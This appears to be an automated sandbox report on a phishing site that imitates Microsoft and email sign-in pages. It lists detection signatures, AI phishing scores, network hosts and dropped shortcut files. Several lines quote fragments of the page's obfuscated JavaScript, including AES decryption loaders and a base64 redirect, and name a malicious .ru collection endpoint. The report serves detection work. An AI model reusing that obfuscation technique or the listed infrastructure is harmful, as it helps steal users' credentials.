
Windows Analysis Report
https://sesworld.com.au:443/it/mount/

Overview

General Information

Sample URL: https://sesworld.com.au:443/it/mount/
Analysis ID: 1510217

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected phishing page
HTML page contains hidden URLs
HTML page contains suspicious javascript code
Phishing site detected (based on image similarity)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
HTML body contains low number of good links
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 2992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sesworld.com.au/it/mount/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6756 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1796 --field-trial-handle=1996,i,5005582365850163615,345631890189895829,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched


Phishing

Source: https://sesworld.com.au/it/mount/, LLM: Score: 8 Reasons: The domain 'sesworld.com.au' does not match the brand name 'Joyce Morgan', and the domain name does not seem to be directly related to the brand. This raises concerns about the legitimacy or authenticity of the message. DOM: 0.0.pages.csv
Source: https://sesworld.com.au/mount/it/, LLM: Score: 10 Reasons: The domain 'sesworld.com.au' does not match the legitimate domain associated with Microsoft, which is 'microsoft.com'. The presence of a Microsoft logo and sign-in form does not necessarily indicate a legitimate website, as phishing sites often mimic legitimate websites to trick users into revealing sensitive information. DOM: 1.4.pages.csv
Source: https://sesworld.com.au/mount/it/, LLM: Score: 8 Reasons: The domain 'sesworld.com.au' does not match the brand name 'Sign in' displayed on the webpage, which is a potential security risk. The presence of a country-code top-level domain '.com.au' suggests that the website is targeted towards Australian users, but the brand name does not indicate any association with a specific Australian service. The minimalistic design of the webpage is effective in guiding the user's attention towards the sign-in field, but this does not necessarily indicate legitimacy. DOM: 1.3.pages.csv
Source: https://sesworld.com.au/mount/it/, HTTP Parser: https://stellarbyteae.ru///8832.php
Source: https://sesworld.com.au/mount/it/, HTTP Parser: window.location.href = atob(
Source: https://sesworld.com.au/mount/it/, Matcher: Found strong image similarity, brand: MICROSOFT
Source: https://sesworld.com.au/mount/it/, HTTP Parser: async function zapper(laborious){ var {a,b,c,d}= json.parse(laborious);return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d),cryptojs.enc.hex.parse(b), {hasher:cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async function lackadaisical(){ yawn.hidden = 0; dactyl.hidden = 1; document.write(awaitzapper(await (await fetch(awaitzapper(atob(`...
Source: https://sesworld.com.au/mount/it/, HTTP Parser: Number of links: 0
Source: https://sesworld.com.au/mount/it/, HTTP Parser: Total embedded image size: 45708
Source: https://sesworld.com.au/mount/it/, HTTP Parser: Base64 decoded: {"a":"6ovPN1KsBIF\/SrwRQvQpvFlG+fEGQRBkjz6mkM+u5Bg=","c":"930065b2c9a1493acde3f8a43c634dbf","b":"05e1372076e1a3eaa62c5d546e54e4d8e0e72403249fc5b39908a64d4474e2ac85cccd82096b6cd06b545c90fc8db6abbe609f334e35f53fe754626878769b4f13898a381d7e00adcb2b6e1885ee2b...
Source: https://sesworld.com.au/mount/it/, HTTP Parser: Title: Log-in to your account securely does not match URL
Source: https://sesworld.com.au/it/mount/, HTTP Parser: No favicon
Source: https://sesworld.com.au/mount/it/, HTTP Parser: No favicon
Source: https://sesworld.com.au/mount/it/, HTTP Parser: No <meta name="author".. found
Source: https://sesworld.com.au/mount/it/, HTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: unknown, HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: global traffic, DNS traffic detected: DNS query: sesworld.com.au
Source: global traffic, DNS traffic detected: DNS query: www.google.com
Source: global traffic, DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic, DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic, DNS traffic detected: DNS query: stellarbyteae.ru
Source: global traffic, DNS traffic detected: DNS query: code.jquery.com
Source: classification engine, Classification label: mal64.phis.win@14/6@22/148
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknown, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sesworld.com.au/it/mount/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1796 --field-trial-handle=1996,i,5005582365850163615,345631890189895829,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, Process created: unknown unknown
Source: Window Recorder, Window detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
MITRE ATT&CK Matrix (a number in front of a technique is the count of matching signatures; unnumbered techniques did not match)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses
Resource Development: 1 Scripting; Domains; DNS Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts
Execution: Windows Management Instrumentation; Scheduled Task/Job; At
Persistence: 1 Scripting; 1 Registry Run Keys / Startup Folder; Logon Script (Windows)
Privilege Escalation: 1 Process Injection; 1 Registry Run Keys / Startup Folder; Logon Script (Windows)
Defense Evasion: 3 Masquerading; 1 Process Injection; 1 Deobfuscate/Decode Files or Information
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager
Discovery: System Service Discovery; Application Window Discovery; Query Registry
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive
Command and Control: 2 Encrypted Channel; 1 Non-Application Layer Protocol; 2 Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact

Source                                  Detection  Scanner          Label
https://sesworld.com.au:443/it/mount/   0%         Avira URL Cloud  safe
No Antivirus matches
Name                       IP               Active  Malicious  Antivirus Detection  Reputation
code.jquery.com            151.101.194.137  true    false      -                    unknown
cdnjs.cloudflare.com       104.17.25.14     true    false      -                    unknown
challenges.cloudflare.com  104.18.94.41     true    false      -                    unknown
www.google.com             142.250.181.228  true    false      -                    unknown
stellarbyteae.ru           172.67.129.11    true    true       -                    unknown
sesworld.com.au            192.250.235.25   true    true       -                    unknown

Name                               Malicious  Antivirus Detection  Reputation
https://sesworld.com.au/mount/it/  true       -                    unknown
https://sesworld.com.au/it/mount/  true       -                    unknown
IP               Domain                     Country        ASN      ASN Name         Malicious
142.250.185.78   unknown                    United States  15169    GOOGLEUS         false
104.17.24.14     unknown                    United States  13335    CLOUDFLARENETUS  false
172.67.129.11    stellarbyteae.ru           United States  13335    CLOUDFLARENETUS  true
1.1.1.1          unknown                    Australia      13335    CLOUDFLARENETUS  false
216.58.206.74    unknown                    United States  15169    GOOGLEUS         false
173.194.76.84    unknown                    United States  15169    GOOGLEUS         false
104.18.94.41     challenges.cloudflare.com  United States  13335    CLOUDFLARENETUS  false
151.101.2.137    unknown                    United States  54113    FASTLYUS         false
104.21.2.94      unknown                    United States  13335    CLOUDFLARENETUS  false
239.255.255.250  unknown                    Reserved       unknown  unknown          false
142.250.181.228  www.google.com             United States  15169    GOOGLEUS         false
142.250.185.195  unknown                    United States  15169    GOOGLEUS         false
151.101.194.137  code.jquery.com            United States  54113    FASTLYUS         false
142.250.184.206  unknown                    United States  15169    GOOGLEUS         false
192.250.235.25   sesworld.com.au            United States  36454    CNSV-LLCUS       true
104.17.25.14     cdnjs.cloudflare.com       United States  13335    CLOUDFLARENETUS  false
142.250.186.99   unknown                    United States  15169    GOOGLEUS         false

IP: 192.168.2.17, 192.168.2.16, 192.168.2.4
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1510217
Start date and time: 2024-09-12 17:32:23 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Sample URL: https://sesworld.com.au:443/it/mount/
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
Analysis Mode: stream
Analysis stop reason: Timeout
Detection: MAL
Classification: mal64.phis.win@14/6@22/148
• Exclude process from analysis (whitelisted): svchost.exe
• Excluded IPs from analysis (whitelisted): 142.250.185.195, 173.194.76.84, 142.250.185.78, 34.104.35.123, 216.58.206.74, 172.217.23.106, 142.250.186.106, 216.58.212.170, 142.250.185.138, 142.250.185.170, 142.250.185.74, 142.250.185.106, 142.250.184.202, 142.250.185.202, 142.250.186.74, 142.250.185.234, 172.217.16.202, 216.58.212.138, 172.217.18.10, 216.58.206.42, 199.232.210.172
• Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, content-autofill.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com
• Not all processes were analyzed, report is missing behavior information
• VT rate limit hit for: https://sesworld.com.au:443/it/mount/
Input / Output

URL: https://sesworld.com.au/it/mount/ Model: jbxai
{
"brand":["Joyce Morgan"],
"contains_trigger_text":true,
"prominent_button_name":"Submit",
"text_input_field_labels":["Enter your email address to proceed"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}

URL: https://sesworld.com.au/it/mount/ Model: jbxai
{
"phishing_score":8,
"brands":["Joyce Morgan"],
"brand_matches_associated_domain":false,
"reasons":"The domain 'sesworld.com.au' does not match the brand name 'Joyce Morgan', and the domain name does not seem to be directly related to the brand. This raises concerns about the legitimacy or authenticity of the message.",
"brand_matches":[false],
"url_match":true}

URL: https://sesworld.com.au/it/mount/ Model: jbxai
{
"brand":["Joyce Morgan"],
"contains_trigger_text":true,
"prominent_button_name":"Submit",
"text_input_field_labels":["Enter your email address to proceed"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}

URL: https://sesworld.com.au/mount/it/ Model: jbxai
{
"brand":["Globi"],
"contains_trigger_text":true,
"prominent_button_name":"Next",
"text_input_field_labels":["Email, phone, or Skype", "No account? Create one! Can't access your account?"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}

URL: https://sesworld.com.au/mount/it/ Model: jbxai
{
"brand":["Microsoft"],
"contains_trigger_text":false,
"prominent_button_name":"Sign in",
"text_input_field_labels":["Email, phone, or Skype", "Password", "Sign-in options"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}

URL: https://sesworld.com.au/mount/it/ Model: jbxai
{
"phishing_score":10,
"brands":["Microsoft"],
"brand_matches_associated_domain":false,
"reasons":"The domain 'sesworld.com.au' does not match the legitimate domain associated with Microsoft, which is 'microsoft.com'. The presence of a Microsoft logo and sign-in form does not necessarily indicate a legitimate website, as phishing sites often mimic legitimate websites to trick users into revealing sensitive information.",
"brand_matches":[false],
"url_match":true}

URL: https://sesworld.com.au/mount/it/ Model: jbxai
{
"phishing_score":8,
"brands":["Sign in"],
"brand_matches_associated_domain":false,
"reasons":"The domain 'sesworld.com.au' does not match the brand name 'Sign in' displayed on the webpage, which is a potential security risk. The presence of a country-code top-level domain '.com.au' suggests that the website is targeted towards Australian users, but the brand name does not indicate any association with a specific Australian service. The minimalistic design of the webpage is effective in guiding the user's attention towards the sign-in field, but this does not necessarily indicate legitimacy.",
"brand_matches":[false],
"url_match":true}

URL: https://sesworld.com.au/mount/it/ Model: jbxai
{
"brand":["Microsoft"],
"contains_trigger_text":false,
"prominent_button_name":"Next",
"text_input_field_labels":["username", "password"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 12 14:32:53 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2673
                  Entropy (8bit):3.9867005441217542
                  Encrypted:false
                  SSDEEP:
                  MD5:955A3B3BB25C047AAC1AB4AA5426DAF7
                  SHA1:C75C3E290D45DF57DB67C8FF19AE7146BA3AA946
                  SHA-256:316EA3BC6D772D5E1F474555D15517AA9BD5CFF809397FFDAEB995E92586CDA9
                  SHA-512:19E82C6657D0D54FE5F40C85B1ACB86A54517BC31907FDD3CB382F7D90943E499E1215353671B5A155683B9DCC4F15F8C509AD7ACF60278A9D2C72286F57BBCD
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,......n.)...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I,Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Y.|....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Y.|..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Y.|...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........C.)y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 12 14:32:53 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2675
                  Entropy (8bit):4.000148624601767
                  Encrypted:false
                  SSDEEP:
                  MD5:19F3FD822908087F47E9E4A4859EFA6E
                  SHA1:F33DBD1A81BBFCF967868EFAABAC6D5D0EEC29D8
                  SHA-256:5EBC496C142DA7A5135065E9D3AC1232AFB5268BC4C8B2417612C2D5911D78DE
                  SHA-512:77268174CD03B9B8FCB49C5697556FBE6E5F999A3514C205E9BB112835852F1BEC758317FD238AFD8ECE3E7A41A2F6A775B163D52CD39B8957871D7E3810DFD7
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,.... .b.)...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I,Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Y.|....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Y.|..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Y.|...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........C.)y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2689
                  Entropy (8bit):4.010176009814871
                  Encrypted:false
                  SSDEEP:
                  MD5:42BDA2BF6BA74FB21DB3B140910559C6
                  SHA1:B375895C5CEF0323F2ACEBE7E8D8B326871F41CE
                  SHA-256:2622E90875F1346FC632A37852159976DD0E771A5699DDA0945D991938EC3270
                  SHA-512:CC3C7511BD6C7F4A1CA7963948586E0105B600428884EDA5BAE318B5347495A55C976089DE6B08678DA7FEDF0F26C3B57656699A86237BACF24FF287CB6DDB2F
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I,Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Y.|....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Y.|..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........C.)y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 12 14:32:52 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2677
                  Entropy (8bit):4.001034619651623
                  Encrypted:false
                  SSDEEP:
                  MD5:094CFF00903614FB244D032169465DD7
                  SHA1:8C3E599A6D36A38629A3145E6C2A6419BC93F1C8
                  SHA-256:F201B6B711F1DE83C0CEBED66E97A1DB17F4E847A64E574F6D636DF45B290C9C
                  SHA-512:785944A3D43487E1AD456519E4FDB0E73A1ED8D10B0A4809A99FB5AA4368EFECA6131F8FB5C9E8E53B2159193E5DB0ED25462771F15288C11ABF8F9A553FFD24
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,.....\.)...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I,Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Y.|....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Y.|..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Y.|...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........C.)y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 12 14:32:53 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2677
                  Entropy (8bit):3.990917978707283
                  Encrypted:false
                  SSDEEP:
                  MD5:F56773167385D5A03156BAA8BEE92C56
                  SHA1:AD56F094F1FF36498D029399F9DFAA0501ED2903
                  SHA-256:1E196A35F6CE0397CA81917BEC5DC85C5A5019A1ED8A02BC1D15BC529033F559
                  SHA-512:D815BFC138B59F9E9B3C431363C3C928836F0C3524BF02F915B5076273BBFEB590A73DCA4122F3CC0C97BD547850ACDACBD2E1F601848A0295E6A23A12F50065
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,......h.)...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I,Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Y.|....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Y.|..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Y.|...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........C.)y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 12 14:32:52 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2679
                  Entropy (8bit):3.9978892561512223
                  Encrypted:false
                  SSDEEP:
                  MD5:A592A46897A29CF2A8112310188FB0FA
                  SHA1:8ABA8D48667D0176D7DD431C9678849E076B158D
                  SHA-256:1039714F260945B1B7131984A525E1D493346C80934797839565C599CC9099D2
                  SHA-512:264DADD1F6DB019F3F08647FBF9AD12E3F276408641205E5B7A3A0D869CC19645A65302A77A2AE701B5AAB6CF37D88611B2329242E24EA8E3A67E72C49508823
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,......R.)...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I,Y.|....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Y.|....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Y.|....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Y.|..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Y.|...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........C.)y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                  No static file info